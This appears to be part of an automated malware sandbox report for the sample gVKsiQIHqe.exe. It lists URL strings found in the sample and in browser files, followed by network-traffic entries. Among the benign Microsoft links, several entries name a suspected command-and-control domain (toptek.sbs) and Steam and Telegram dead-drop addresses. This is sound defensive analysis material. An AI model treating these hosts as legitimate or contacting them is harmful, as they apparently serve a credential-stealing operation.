                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                  Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                  Source: 000003.log8.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://gaana.com/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                  Source: P8QIEK.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://m.kugou.com/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://m.soundcloud.com/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://m.vk.com/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                  Source: Cookies.9.drString found in binary or memory: https://msn.comXID/
                  Source: Cookies.9.drString found in binary or memory: https://msn.comXIDv10
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://music.amazon.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://music.apple.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://music.yandex.com
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: 000003.log7.8.dr, 2cc80dabc69f58b6_0.8.drString found in binary or memory: https://ntp.msn.com
                  Source: 000003.log0.8.dr, 000003.log3.8.drString found in binary or memory: https://ntp.msn.com/
                  Source: 000003.log0.8.drString found in binary or memory: https://ntp.msn.com/0
                  Source: QuotaManager.8.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 2cc80dabc69f58b6_1.8.dr, 000003.log0.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 000003.log0.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: Session_13379407070125135.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                  Source: QuotaManager.8.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: 2cc80dabc69f58b6_0.8.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://open.spotify.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/0/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/0/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://srtb.msn.com/
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000083E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://t.me/k04ael
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://tidal.com/
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000881000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbs
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/$G
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/(
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/.G
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/0
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/2G
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/4
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/D
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/H
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/L
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/LG
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/O
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/PG
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/PV
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/d8
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/rs
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2207333842.000000000090E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2221553316.000000000090C000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/w
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbs7QQIMGV
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsData
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsL
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsMGDJMOZ
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsMGDJMOZGIGIYTFFYT.pdfition:
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsQQ16FUSJ
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsosh;
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://twitter.com/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://vibe.naver.com/today
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.telegram.org/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.whatsapp.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.deezer.com/
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, 4W4EKN.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: content_new.js.8.dr, content.js.8.drString found in binary or memory: https://www.google.com/chrome
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 2a74f5d3-95f0-423b-aeaa-f8df50f732fd.tmp.9.drString found in binary or memory: https://www.googleapis.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.iheart.com/podcast/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.instagram.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.last.fm/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.messenger.com
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.office.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.tiktok.com/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.youtube.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://y.music.163.com/m/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
